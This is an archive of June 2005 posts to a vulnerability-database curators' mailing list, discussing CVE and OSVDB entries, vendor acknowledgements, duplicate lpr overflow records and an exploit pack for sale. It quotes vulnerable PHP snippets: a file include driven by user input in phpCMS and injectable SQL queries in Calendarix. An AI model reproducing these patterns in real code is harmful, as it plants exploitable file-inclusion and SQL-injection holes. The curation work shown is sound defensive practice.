From jericho at attrition.org Wed Jun 1 05:02:58 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 05:03:00 2005 Subject: [VIM] delayed vendor response Message-ID: this baffled me until I googled for the title. the vendor is replying to a May 2003 post =) http://archives.neohapsis.com/archives/bugtraq/2003-05/0106.html ---------- Forwarded message ---------- From: preasoner@astrocorp.com To: bugtraq@securityfocus.com Date: 24 May 2005 15:39:55 -0000 Subject: Re: PowerLink WAN Aggregator - Vunerability In-Reply-To: This issue only applies to devices using firmware version 1.7.3.1. Any newer revisions or newer hardware does not contain this vulnerability From jericho at attrition.org Wed Jun 1 07:39:10 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 07:39:13 2005 Subject: [VIM] Question on BookReview vulns (fwd) In-Reply-To: References: Message-ID: : FYI... lostmon says he's a data mangler for OSVDB... any inside scoop : from the OSVDB people? Off the record.. It is clear as you can see, that he tests live sites to find vulnerabilites often times. This is something that many of the core OSVDB folks do *not* approve of at all. The fact that he does this and prominantly announces his involvement in OSVDB is very worisome to a few of us. It is getting to the point where I think one of us needs to have a serious talk with him. Usually I catch his stuff and figure out the real vendor, determine that I can't figure it out, or just don't add it without questioning him further. And let me tell you, questioning him can be painful as his English is not very good. For BookReview, the bottom of the page shows what you found: : Google search suggests that there is a product called "BookReview" by : somebody named W.M.R. Simpson, apparently a Christian software : developer. His URL is at http://www.justwilliams.com/. : : However, I can't find any information on "BookReview" on that site, : either. We have the vendor URL wrong on our entries, which I will fix. But my initial digging suggested it was a product you could download and I didn't follow through when making the entries. : Can "BookReview" be downloaded and used by other people? If so, do you : know where that information is? : : I am asking because it seems like "BookReview" is custom software for : live web site, but it is not generally available to the public, and CVE : only covers vulnerabilities in publicly available software. Let me know how he replies and I can translate if you need =) I've gotten fairly proficient at speaking Lostmonese. .b From jericho at attrition.org Wed Jun 1 08:02:14 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 08:02:15 2005 Subject: [VIM] discuss: secunia footnote Message-ID: Please note: The information, which this Secunia Advisory is based upon, comes from third party unless stated otherwise. Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others. -- This is the footnote of each Secunia entry. Is this the value add of their service? Do they *really* do that for each entry? Collect: check Validate: ? Verify: ? No matter how you cut it, validating and verifying each and every vuln seems a stretch. Unless you have a LOT of hardware for testing, a nice pipe for the constant downloads, and a HUGE budget for the software and hardware (think Oracle, DB2, Cisco, etc) .. this simply is not possible. Not to mention the staff present to test all of this. Thoughts? From coley at linus.mitre.org Wed Jun 1 11:29:21 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed Jun 1 11:38:58 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: Only Secunia can answer of course, but similar claims seem to be made by other commercial services. One big problem is that you can't tell what sort of validation has taken place, or what "validation" even means. Was the vendor contacted and did the vendor confirm the issue? Seems impossible to do this for all vendors, since you can't even CONTACT some vendors without a support contract. Did they replicate the issue in their own labs? A very expensive proposition - and problematic when some researcher advisories are too vague to reconstruct (or construct) the appropriate attack. When the researcher says that the vendor fixed the problem, is that claim inherently trusted, or is it independently verified? VDBs don't record that sort of information - at least, not publicly. - Steve From coley at mitre.org Wed Jun 1 15:11:25 2005 From: coley at mitre.org (Steven M. Christey) Date: Wed Jun 1 15:21:07 2005 Subject: [VIM] Broken SecurityFocus Bugtraq links Message-ID: <200506011911.j51JBPPL016513@linus.mitre.org> Maybe this is just temporary, but it looks like SecurityFocus' new web design has broken nearly all the Bugtraq URL's. - Steve From jericho at attrition.org Wed Jun 1 17:15:33 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 17:15:36 2005 Subject: [VIM] Broken SecurityFocus Bugtraq links In-Reply-To: <200506011911.j51JBPPL016513@linus.mitre.org> References: <200506011911.j51JBPPL016513@linus.mitre.org> Message-ID: : Maybe this is just temporary, but it looks like SecurityFocus' new web : design has broken nearly all the Bugtraq URL's. When it comes to referencing mail list posts, I use neohapsis or seclists 99% of the time. Loading a post on the SF archive is extremely slow (the amount of images and junk per page load is horrid), and the URL gives no information (another reason I shy away from theaimsgroup). Compare the URLs of an archived post from those two places to neohapsis/seclists. Seeing the year/month in the URL is often handy for quick identification of a timeframe for the vuln. =) From jericho at attrition.org Wed Jun 1 17:36:14 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 17:36:17 2005 Subject: [VIM] question about a potential vulnerability in os4e product Message-ID: Hello, My name is Brian Martin, I work with the Open Source Vulnerability Database which tracks security vulnerabilities in software. We were recently directed to an advisory regarding one of your products: http://www.under9round.com/os4e.txt The advisory states: "os4e is a free web relation manager tool released by os4e.com by using this portal you can easily manage the relations between students and the teachers" However, looking at your product page I don't see "os4e" listed as a product. Can you confirm if os4e is a product as well as your name? If so, can you verify this is a valid issue? Thanks! Brian OSVDB.org From sullo at cirt.net Wed Jun 1 18:12:59 2005 From: sullo at cirt.net (Sullo) Date: Wed Jun 1 18:22:37 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: <429E32EB.2080800@cirt.net> security curmudgeon wrote: > > Please note: The information, which this Secunia Advisory is based > upon, comes from third party unless stated otherwise. > > Secunia collects, validates, and verifies all vulnerability reports > issued by security research groups, vendors, and others. > I doubt very much that they do this in any meaningful manner. I suspect it means more that they verify the report is (somewhat) validated/verified, i.e., the product really exists and the report seems "credible enough." Very misleading, if that's the case. -- http://www.cirt.net/ | http://www.osvdb.org/ From ph0enix at attrition.org Thu Jun 2 11:43:57 2005 From: ph0enix at attrition.org (ph0enix) Date: Thu Jun 2 11:43:59 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: Well, I can imagine that some of them are able to validate and verify the vulns since some of them are 'fluent C speakers' and they're always looking for people with such skills. But ALL vulns? I don't think that's true... From coley at linus.mitre.org Thu Jun 2 13:23:01 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu Jun 2 13:32:34 2005 Subject: [VIM] Broken SecurityFocus Bugtraq links In-Reply-To: References: <200506011911.j51JBPPL016513@linus.mitre.org> Message-ID: On Wed, 1 Jun 2005, security curmudgeon wrote: > When it comes to referencing mail list posts, I use neohapsis or seclists > 99% of the time. I use whatever's available, depending on how I come across it. I like theaimsgroup because their search interface is clean and quick, and the threading is very easy to navigate. The only problems are that long subject lines get truncated and the search database isn't always up-to-the-minute. For CVE, we don't need the URL's to have year/month information in them because the URL's are always associated with a reference that has the post's title and date, so the CVE user already has that info. Plus it helps for looking up new URL's when the old ones break. Recently, I was able to do a full search-and-replace on URL's for full-disclosure posts when the list was moved to grok.org.uk, and I could confirm it by checking the associated FULLDISC reference with the subject line obtained from visiting the URL. CVE is heavily a theaimsgroup shop, with about 60% of the Bugtraq URLs, but we've got a good share of Neohapsis and SecurityFocus URLs too. - Steve From coley at mitre.org Thu Jun 2 16:44:00 2005 From: coley at mitre.org (Steven M. Christey) Date: Thu Jun 2 16:53:41 2005 Subject: [VIM] Provable vendor ack for phpCMS Message-ID: <200506022044.j52Ki0WL024712@linus.mitre.org> The recent phpCMS class.layout_phpcms.php/language file include/directory traversal vulnerability is described here: :REFERENCE BUGTRAQ:20050602 SEC-CONSULT SA20050602-1 :: Arbitrary File Inclusion in phpCMS 1.2.x URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111773774916907&w=2 Researcher claims acknowledgement, but the text here: http://www.phpcms.de/download/index.en.html is somewhat vague - "There was a security vulnerability discovered." Proof of vendor acknowledgement of this specific issue follows: - the download ZIP file for the security fix mainly includes class.layout_phpcms.php, which has hard-coded values for the language parameter. - In addition, source code review of the CVS repository for class.layout_phpcms.php here: http://cvs.sourceforge.net/viewcvs.py/phpcms/phpcms/parser/include/class.layout_phpcms.php?rev=1.12.2.37&view=markup shows that the original 1.2.1 version used user input for the language parameter: include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]); (where the version for the security fix looks like this: if ($_GET['language'] == 'de') { include($PHPCMS_INCLUDEPATH.'/language.de'); } else { include($PHPCMS_INCLUDEPATH.'/language.en'); Thus, the bug mentioned in the Bugtraq post was fixed by this security update. - Steve From jericho at attrition.org Thu Jun 2 17:00:25 2005 From: jericho at attrition.org (security curmudgeon) Date: Thu Jun 2 17:00:27 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: : Well, I can imagine that some of them are able to validate and verify : the vulns since some of them are 'fluent C speakers' and they're always : looking for people with such skills. But ALL vulns? I don't think that's : true... I am fairly sure they validate and dig into vulnerabilities sometimes, just as Christey does. There are times where I get information, dig up a changelog entry and move on. Three or four days later Secunia will release their advisory with a little more details, and it seems it is from their own examination of the code. But.. how do they validate the high end expensive software? How do they validate extremely vague information on closed source products? That is where i wonder if the wording is a little far reaching. From ph0enix at attrition.org Fri Jun 3 02:20:41 2005 From: ph0enix at attrition.org (ph0enix) Date: Fri Jun 3 02:20:43 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: > But.. how do they validate the high end expensive software? How do they > validate extremely vague information on closed source products? That is > where i wonder if the wording is a little far reaching. could it be, that they have some people at Oracle et al. which do that for them? Or could it be that they have illegal copies of closed source products? From coley at mitre.org Fri Jun 3 17:09:37 2005 From: coley at mitre.org (Steven M. Christey) Date: Fri Jun 3 17:19:18 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post Message-ID: <200506032109.j53L9bFB006252@linus.mitre.org> SQL injection and form field tampering issues in LokwaBB were announced by Frog Man way back in June 2002: BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html 3 scripts were mentioned, namely member.php, misc.php, and pm.php. member.php and misc.php are clearly SQL injection. pm.php allows attackers to read messages by modifying the "pmid" parameter/variable to arbitrary message IDs, which is NOT SQL injection. However, multiple VDBs have inadvertently merged the pm.php issue with the other issues. Further clarification is obtained by reading Frog Man's more detailed post at: http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt (a Google French-to-English translation is sufficient to get the point across). - Steve From jericho at attrition.org Sun Jun 5 02:59:43 2005 From: jericho at attrition.org (security curmudgeon) Date: Sun Jun 5 02:59:45 2005 Subject: [VIM] lpr overflow - multiple cve/osvdb? Message-ID: CVE-1999-0335 Buffer overflow in BSD and linux lpr command allows local users to execute commands as root through the classification option. XF:lpr-bsd-lprbo CVE-1999-0032 Buffer overflow in BSD-based lpr package allows local users to gain root privileges. CERT:CA-97.19.bsdlp AUSCERT:AA-96.12 CIAC:I-042 SGI:19980402-01-PX XF:bsd-lprbo2 XF:bsd-lprbo XF:lpr-bo bsd-lprbo (409) refs to: CVE-1999-0032 and CVE-1999-0335 http://archives.neohapsis.com/archives/bugtraq/1996_4/0151.html 1996-08-01 lpr-bo (843) refs to: CVE-1999-0032 (no date) The mail list attached to ISS 409 is 1996-10-25, -C option exploit. This is currently OSVDB 1105 and 11499 (one for each cve), both NEW status. -- As best I can tell, these are the same vuln based on the inbreeding of ext-refs, the approx dates, and nothing (obvious) to suggest there is a second parameter or method for exploiting. From James.Williams at ca.com Mon Jun 6 21:11:53 2005 From: James.Williams at ca.com (Williams, James K) Date: Mon Jun 6 21:21:46 2005 Subject: [VIM] discuss: secunia footnote Message-ID: > I doubt very much that they do this in any meaningful manner. > I suspect it means more that they verify the report is > (somewhat) validated/verified, i.e., the product really > exists and the report seems "credible enough." Very > misleading, if that's the case. I've had to deal with this issue from several different perspectives recently. Bottom line is that it is simply a matter of semantics. Use very liberal and forgiving definitions of "validate" and "verify", and remind yourself that the Marketing Dept probably has last say over what goes on a web site. If I didn't validate and verify myself, then it hasn't been done to my satisfaction. And this is why Steve and I have always worked 140 hr weeks. Regards, kw From coley at mitre.org Mon Jun 6 23:51:35 2005 From: coley at mitre.org (Steven M. Christey) Date: Tue Jun 7 00:01:42 2005 Subject: [VIM] Missed PHP file include in recent Calendarix Message-ID: <200506070351.j573pZt2018835@linus.mitre.org> reference: BUGTRAQ:20050531 multiple vulnerability Calendarix Advanced URL:http://archives.neohapsis.com/archives/bugtraq/2005-05/0356.html Multiple VDBs seem to have missed the following portion of the post: Include line 16 admin/cal_admintop.php:include_once($calpath."cal_utils.php"); I downloaded the demo version of Calendarix, and there are only 2 previous PHP statements before this line - both include statements, neither of which seems to define $calpath, which is defined in cal_config.php. cal_admintop.php itself is included a number of times in other files. Thus it appears to be a typical file include issue where an include file depends on variables defined by previously included files, but is directly callable assuming the relevant PHP configuration etc. etc. etc. Also, at least two of the SQL injection issues in the "catview" parameter seem to lead to the same eventqry function as defined in cal_utils.php. cal_day.php line 112: $result = eventqry($vda,$vdm,$year,$uname,$order,true,$catview) ; cal_week.php line 193: $result = eventqry($fdd,$fdm,$fdy,$uname,$order,true,$catview) ; cal_cat.php lines 34 through 39 have their own vulnerable select calls, though: if (($ALLOWVIEW[6]==1)&&($catview!=0)) $query = "select cat_id,cat_name,cat_color,parent_id from ".$CAT_TB." where cat_id=$catview"; if ($ALLOWVIEW[11]==1) $query = "select cat_id,cat_name,cat_color,parent_id from ".$CAT_TB." where cat_id=$catview or parent_id=$catview"; This was based solely on source code inspection of the demo version of Calendarix Advanced. I'll be sending an inquiry to the developer shortly. - Steve From coley at linus.mitre.org Tue Jun 7 00:00:50 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue Jun 7 00:10:45 2005 Subject: [VIM] Calendarix vendor inquiry sent Message-ID: ---------- Forwarded message ---------- Date: Mon, 6 Jun 2005 23:57:53 -0400 (EDT) From: Steven M. Christey To: webmaster@calendarix.com Subject: Security vulnerabilities reported in Calendarix Hello, I am a computer security professional and the editor for the Common Vulnerabilities and Exposures (CVE) project. CVE is a list of software vulnerabilities, and it is widely used in the computer security industry. Recently, several vulnerabilities in Calendarix were publicly reported to a well-known security mailing list: BUGTRAQ:20050531 multiple vulnerability Calendarix Advanced URL:http://archives.neohapsis.com/archives/bugtraq/2005-05/0356.html Additional information is at: URL:http://www.osvdb.org/16973 URL:http://securitytracker.com/alerts/2005/May/1014083.html URL:http://secunia.com/advisories/15569 Is this vulnerability report accurate? If so, then is the problem fixed, and in which versions? Note that I downloaded the demo version of Calendarix Advanced, and based on inspection of the source code, the reported issues seem to be legitimate for certain common PHP configurations. Thank you, Steve Christey CVE Editor Principal Information Security Engineer The MITRE Corporation From coley at mitre.org Tue Jun 7 00:10:23 2005 From: coley at mitre.org (Steven M. Christey) Date: Tue Jun 7 00:20:33 2005 Subject: [VIM] MWChat start_lobby.php vendor acknowledgement Message-ID: <200506070410.j574ANhk019138@linus.mitre.org> On http://www.appindex.net, The vendor posted an item "Recent News ---- MWChat 6.8 Released! Jun 6, 2005" which says "MWchat 6.8 has been release to fix a minor security issue with included files. This bug report is available at: http://securitytracker.com/alerts/2005/Jun/1014090.html" - Steve From jericho at attrition.org Tue Jun 7 04:40:21 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 7 04:40:23 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post In-Reply-To: <200506032109.j53L9bFB006252@linus.mitre.org> References: <200506032109.j53L9bFB006252@linus.mitre.org> Message-ID: : SQL injection and form field tampering issues in LokwaBB were : announced by Frog Man way back in June 2002: : : BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora : URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html Is there no CVE for this issue? A search for 'lokwa' or 'lokwabb' finds nothing. From jericho at attrition.org Tue Jun 7 05:38:55 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 7 05:39:00 2005 Subject: [VIM] livingmailing vulnerability question Message-ID: Hi Romty, I work on the Open Source Vulnerability Database (OSVDB) project. While monitoring the Security Tracker web site, I ran across a vulnerability you discovered: http://securitytracker.com/alerts/2005/Jun/1014087.html Software Package :livingmailing Vendor Homepage :http://livingcolor.it Platforms :Windows Base Server Vulnerability :Sqlinjection Risk :High! Vulnerable Versions :livingmailing vers. 1.3 I was wondering where you got this software. While researching the vendor, I discovered that the vendor site has not been operational for some time. According to archive.org, they have had the same "Coming Soon" page since at least Oct 2002: http://web.archive.org/web/*/http://www.livingcolor.it/ Could you provide any additional details about the software package, where I could get a copy, etc? Thanks! Brian OSVDB.org ps: http://www.under9round.com/lmg.txt does not work currently. From coley at linus.mitre.org Tue Jun 7 17:07:28 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue Jun 7 17:17:29 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post In-Reply-To: References: <200506032109.j53L9bFB006252@linus.mitre.org> Message-ID: On Tue, 7 Jun 2005, security curmudgeon wrote: > : SQL injection and form field tampering issues in LokwaBB were > : announced by Frog Man way back in June 2002: > : > : BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora > : URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html > > Is there no CVE for this issue? A search for 'lokwa' or 'lokwabb' finds > nothing. This is part of a very large CVE backlog that I've been clearing out in recent months (that's where most of the candidates from previous years are coming from). These are reviewed and processed in large batches. A CVE will be probably be assigned to the issue within the next couple weeks, along with a lot of other CVE's for old issues. - Steve From jericho at attrition.org Tue Jun 7 18:45:57 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 7 18:45:59 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post In-Reply-To: References: <200506032109.j53L9bFB006252@linus.mitre.org> Message-ID: : > : SQL injection and form field tampering issues in LokwaBB were : > : announced by Frog Man way back in June 2002: : > : : > : BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora : > : URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html : > : > Is there no CVE for this issue? A search for 'lokwa' or 'lokwabb' finds : > nothing. : : This is part of a very large CVE backlog that I've been clearing out in : recent months (that's where most of the candidates from previous years : are coming from). These are reviewed and processed in large batches. : A CVE will be probably be assigned to the issue within the next couple : weeks, along with a lot of other CVE's for old issues. Gotcha, just confirming =) From coley at linus.mitre.org Tue Jun 7 23:39:27 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue Jun 7 23:49:30 2005 Subject: [VIM] Calendarix vendor inquiry sent In-Reply-To: References: Message-ID: Vendor responded - "just started looking into this vulnerability. It may be true but the variables exposed pose no serious threat. However, plans are in place to fix these vulnerabilities in the next version release." - Steve From jericho at attrition.org Wed Jun 8 00:39:45 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 8 00:39:50 2005 Subject: [VIM] old Solaris ff.core help =) Message-ID: Hey Casper, I'm digging into some old vulnerabilities for my work with the Open Source Vulnerability Database (OSVDB). I'm currently trying to sort out the old Solaris ff.core vulnerabilities and running into some confusion. Since you were an active poster to Bugtraq back then and probably have more intimate Solaris knowledge than anyone else, I was hoping you could help out. Depending on how you read the public information, there are potentially 4 vulnerabilities. Aug 30, 1994 - Solaris ff.core IFS Variable Privilege Escalation http://archives.neohapsis.com/archives/bugtraq/1994_4/0621.html http://sunsolve.sun.com/search/document.do?assetkey=1-21-101889-05-1 This is part of patch 101889 Apr 28, 1998 - Solaris ff.core Unspecified Issue http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-101889-05-1 Based on the revisions of 101889, this suggests ff.core was vulnerable again Jan 7, 1999 - Solaris ff.core Symlink Arbitrary File Modification http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0442 http://archives.neohapsis.com/archives/bugtraq/1999_1/0103.html I'm 99% sure these are three distinct vulnerabilities in the ff.core utility. My real confusion comes from Bugtraq 94/95 traffic, as seen in this post: http://archives.neohapsis.com/archives/bugtraq/1995_1/0003.html This is one of a few mentions of "two vulnerabilities in ff.core". Based on the date, the Aug 30, 1994 IFS would be one of the two, but I can't find record of the second beyond the somewhat cryptic 101889 patch notes and several mail list posts. In short, can you confirm there were two vulnerabilities around 1994/1995 in ff.core? If so, any hint as to what the second was, or the impact? Given the age of the program, I don't think it is letting any serious cat out of the bag =) This is purely for a historic perspective on vulnerabilities. Thanks for any help you can provide! Brian OSVDB.org From coley at linus.mitre.org Wed Jun 8 00:53:47 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed Jun 8 01:03:58 2005 Subject: [VIM] lpr overflow - multiple cve/osvdb? In-Reply-To: References: Message-ID: On Sun, 5 Jun 2005, security curmudgeon wrote: > CVE-1999-0335 > Buffer overflow in BSD and linux lpr command allows local users to execute > commands as root through the classification option. > XF:lpr-bsd-lprbo > > CVE-1999-0032 > Buffer overflow in BSD-based lpr package allows local users to gain root > privileges. > CERT:CA-97.19.bsdlp > AUSCERT:AA-96.12 > CIAC:I-042 > SGI:19980402-01-PX > XF:bsd-lprbo2 > XF:bsd-lprbo > XF:lpr-bo The problem here is twofold: - I can't see information from any of the authoritative references in CVE-1999-0032 that indicates that it's specifically the -C classification option that's affected - the lpr-bsd-lprbo reference for CVE-1999-0335 no longer exists Let's look at the timelines here... 1996-10-25 Bugtraq: Linux & BSD's lpr exploit http://archives.neohapsis.com/archives/bugtraq/1996_4/0151.html 1999-11-26 AusCERT: AA-96.12 http://www.auscert.org.au/render.html?it=1865 Part of the AusCERT advisory says: Due to insufficient bounds checking on arguments which are supplied by users, it is possible to overwrite the internal stack space of the lpr program while it is executing. This can allow an intruder to cause lpr to execute arbitrary commands by supplying a carefully designed argument to lpr. AUSCERT:AA-96.12 includes a wrapper program to use as a workaround - this wrapper exits if *any* command line argument is too long. Obviously this would be relevant with respect to a long -C option, but the (mostly academic I suspect) question is whether there were other overflows in lpr at around the same time. AUSCERT:AA-96.12 includes several references to advisories, which don't reference the original Bugtraq post or give specific details. There's hope for a FreeBSD advisory FreeBSD-SA-96:18.lpr.asc, since it mentions some patches, but I can't find the patches. But then the AusCERT advisory also mentions a Linux update, "Update-11-25-1996.vulnerability-lpr-0.06-v1.2", which gets us to a November 22, 1996 post archived here: http://www.redhat.com/archives/linux-security/1996-November/msg00017.html which says: "lpr utility from the lpr 0.06 suffers from the buffer overrun problem" as well as "The exploits that exercise this vulnerability were made available." Curiously, Alexander O. Yuriev responds to a Bugtraq post on 1996-08-14, titled "Re: Possible bufferoverflow condition in lpr, xterm and xload," but is talking about the xterm/xload overflow (in a -display argument, probably a library problem): http://www.security-express.com/archives/bugtraq/1996_3/0306.html but no mention of lpr. However, this leads us to a Bugtraq post by bloodmask on 1996-08-13: Possible bufferoverflow condition in lpr, xterm and xload http://www.security-express.com/archives/bugtraq/1996_3/0257.html and says: "suspicious behavior in lpr [hoho, this is a quite common suid root binary, in many commercail and non-commercail versions of unix], lpr exhibited the same behavior as mount, by segmenting when supplied with an argument above 1024 bytes." There's no specific mention of the -C argument, but at least we have some mention of command line arguments in general. Followups to this post immediately concentrate on the xterm/xload issues and I can't find another mention of lpr at all. So, probably what happened is this: - 1996-08-13, bloodmask says there are command line overflows in lpr - 1996-10-25, Vadim Kolontsov posts an exploit that uses the -C option - 1996-10-25, we have a forwarded post from Bugtraq to freebsd-security: http://docs.freebsd.org/cgi/getmsg.cgi?fetch=46265+0+archive/1996/freebsd-security/19961020.freebsd-security - 1996-10-27, FreeBSD fixes an overflow in lpr - only one day after the exploit is published, thus establishing an extremely close proximity to the -C option exploit, especially given the freebsd-security list post. (This fix date was obtained from FreeBSD-SA-96:18) - 1999-11-26, AusCERT releases their advisory, mentioning FreeBSD-SA-96:18 and others If only there were some common identifier that everybody could have used to avoid this whole confusing mess... > bsd-lprbo (409) > refs to: CVE-1999-0032 and CVE-1999-0335 > http://archives.neohapsis.com/archives/bugtraq/1996_4/0151.html > 1996-08-01 The disclosure date hear appears to be wrong - the earliest mention seems to be Bugtraq 1996-08-13. > This is currently OSVDB 1105 and 11499 (one for each cve), both NEW > status. Since CVE-1999-0032 is far more authoritative than CVE-1999-0335, reference-wise anyway, I will deprecate CVE-1999-0335 in the next CVE version, and modify CVE-1999-0032 to have all the additional references and specifically discuss the -C option. *phew* that was a whole lotta work... probably a well-placed email to one or two gurus from that time period would have been a lot faster! - Steve From jericho at attrition.org Wed Jun 8 03:18:38 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 8 03:18:41 2005 Subject: [VIM] Missed PHP file include in recent Calendarix In-Reply-To: <200506070351.j573pZt2018835@linus.mitre.org> References: <200506070351.j573pZt2018835@linus.mitre.org> Message-ID: : BUGTRAQ:20050531 multiple vulnerability Calendarix Advanced : URL:http://archives.neohapsis.com/archives/bugtraq/2005-05/0356.html : : Multiple VDBs seem to have missed the following portion of the post: : : Include : : line 16 : admin/cal_admintop.php:include_once($calpath."cal_utils.php"); I didn't create an entry for this because it wasn't clear what 'include' entailed. Looking back, I probably should have created an unspecified type entry until more details were discovered. Given that some vulns are file inclusion, others are HTML inclusion, one I created today was for arbitrary image inclusion.. just seeing "include" was not crystal clear. My first take was this was relevant code to the other vulnerabilities. : Thus it appears to be a typical file include issue where an include file : depends on variables defined by previously included files, but is : directly callable assuming the relevant PHP configuration etc. etc. etc. Nice.. From jericho at attrition.org Wed Jun 8 03:51:42 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 8 03:51:43 2005 Subject: [VIM] update: VulnDisco Message-ID: Updating with new vulnerabilities. The 'sample pack' advertised has 3 vulnerabilities, and is free to current CANVAS customers. ---------- Forwarded message ---------- From: security curmudgeon To: vim@attrition.org Date: Sat, 14 May 2005 07:01:49 -0400 (EDT) Reply-To: Vulnerability Information Managers Subject: [VIM] discuss: VulnDisco Evgeny Demidov of GLEG posted to DailyDave announcing the release of their "VulnDisco" pack. This is a pack of exploits for the CANVAS framework, released by Aitel & Immunity. According to PDF, this pack contained a wide variety of 0day exploits. Since then, he has followed up with three updates that include a few more exploits each time. Before anyone replies, consider this. I mailed Dave Aitel and asked if he could verify that this pack of vulnerabilities were legit. Since they are a CANVAS framework based set, I figured he of all people could authenticate Evgeny's research. Dave replied and said he had not tested any of it, and in fact, had not received a copy. While Immunity was a reseller of the VulnDisco pack, they were not privileged to a copy of it. I found that surprising. There has been no followup on DailyDave regarding these packs, good nor bad. Below you will find a summary of the posts and exploits claimed in each pack. That said, how does a vulnerability database handle such claims? Should we be creating entries with the details we have? Or does this amount of exploit code in one place suggest it may not be fully legit? Thoughts from the madmen? -- http://archives.neohapsis.com/archives/dailydave/2005-q1/0290.html [Dailydave] ANNOUNCE - VulnDisco Pack for CANVAS release http://www.gleg.net/download/VULNDISCO.pdf To summarize: Remotes in this version: Windows [0day] Ipswitch IMail buffer overflow Vendor URL: http://www.ipswitch.com Notes: remote exploit for certain IMail service. [0day] MaxDB WebAgent stack overflow Vendor URL: http://www.mysql.com Notes: remote exploit for MaxDB WebTools wahttp service. [0day] Pragma Fortress buffer overflow Vendor URL: http://www.pragmasys.com Notes: remote exploit for Pragma Fortress SSH server. Unix [0day] Exim 4.43 stack overflow Vendor URL: http://www.exim.org Notes: exploit for published AUTH SPA stack overflow. [0day] ntpd buffer overflow Vendor URL: http://www.ntp.org Notes: remote root for certain configurations of ntpd [0day] Samba buffer overflow Vendor URL: http://www.samba.org Notes: remote exploit for certain configurations of smbd [0day] Sun ONE ASP buffer overflow Vendor URL: http://www.sun.com [0day] Sun ONE ASP arbitrary file retrieval exploit Vendor URL: http://www.sun.com Denial of service attacks [0day] FreeBSD/NetBSD/OpenBSD kernel remote DoS Vendor URL: http://www.freebsd.org, http://www.openbsd.org, http://www.openbsd.org Notes: remote crash&reboot for certain configurations of *BSD kernel [0day] fam remote DoS Vendor URL: http://oss.sgi.com/projects/fam/ Notes: remote crash for certain configurations of fam [0day] Ipswitch IMail remote DoS Vendor URL: http://www.ipswitch.com [0day] Kerio MailServer remote DoS Vendor URL: http://www.kerio.com Notes: remote crash in Kerio MailServer [0day] MDaemon remote DoS Vendor URL: http://www.altn.com [0day] LSASS.EXE remote DoS Vendor URL: http://www.microsoft.com [0day] MySQL 4.x server remote DoS Vendor URL: http://www.mysql.com http://archives.neohapsis.com/archives/dailydave/2005-q1/0340.html [Dailydave] VulnDisco Pack for CANVAS v1.1 is available New remotes in this version: [0day] Ethereal heap overflow (proof of concept) [0day] Miranda IM buffer overflow [0day] MDaemon buffer overflow http://archives.neohapsis.com/archives/dailydave/2005-q2/0008.html [Dailydave] VulnDisco Pack v1.2 for CANVAS is available New remotes in this version: [0day] PHP remote DoS [0day] OpenSSL remote DoS [0day] NSS heap overflow (proof of concept)** http://archives.neohapsis.com/archives/dailydave/2005-q2/0087.html [Dailydave] VulnDisco Pack v1.3 for CANVAS is available New remote in this version: [0day] SIMA - Samba remote root http://archives.neohapsis.com/archives/dailydave/2005-q2/0295.html [Dailydave] VulnDisco Sample Pack 1.1 New remotes in this version: [0day] Ethereal heap overflow [0day] TCPDUMP DoS From coley at mitre.org Thu Jun 9 02:10:18 2005 From: coley at mitre.org (Steven M. Christey) Date: Thu Jun 9 02:20:41 2005 Subject: [VIM] Provable vendor ack for Goodtech SMTP issue Message-ID: <200506090610.j596AI4r024857@linus.mitre.org> Since I was in the general area, I emailed support@goodtechsys.com regarding this vulnerability: BUGTRAQ:20050607 Denial of Service vulnerability in GoodTech SMTP Server for Windows NT/2000/XP version 5.14 URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111817606013776&w=2 and they confirmed Reed Arvin's assertion that version 5.15 fixes the issue. - Steve From jericho at attrition.org Fri Jun 10 04:33:01 2005 From: jericho at attrition.org (security curmudgeon) Date: Fri Jun 10 04:33:03 2005 Subject: [VIM] 17136: Lpanel diagnose.php Arbitrary Domain DNS Setting Reset DoS (fwd) Message-ID: ---------- Forwarded message ---------- From: Michael Cruz To: moderators@osvdb.org Date: Fri, 10 Jun 2005 01:25:16 -0400 Subject: [OSVDB Mods] [Change Request] 17136: Lpanel diagnose.php Arbitrary Domain DNS Setting Reset DoS . Lpanel team has released an update within an hour of this discovery as noted by the change log: Please note this user spamed our server forums and also 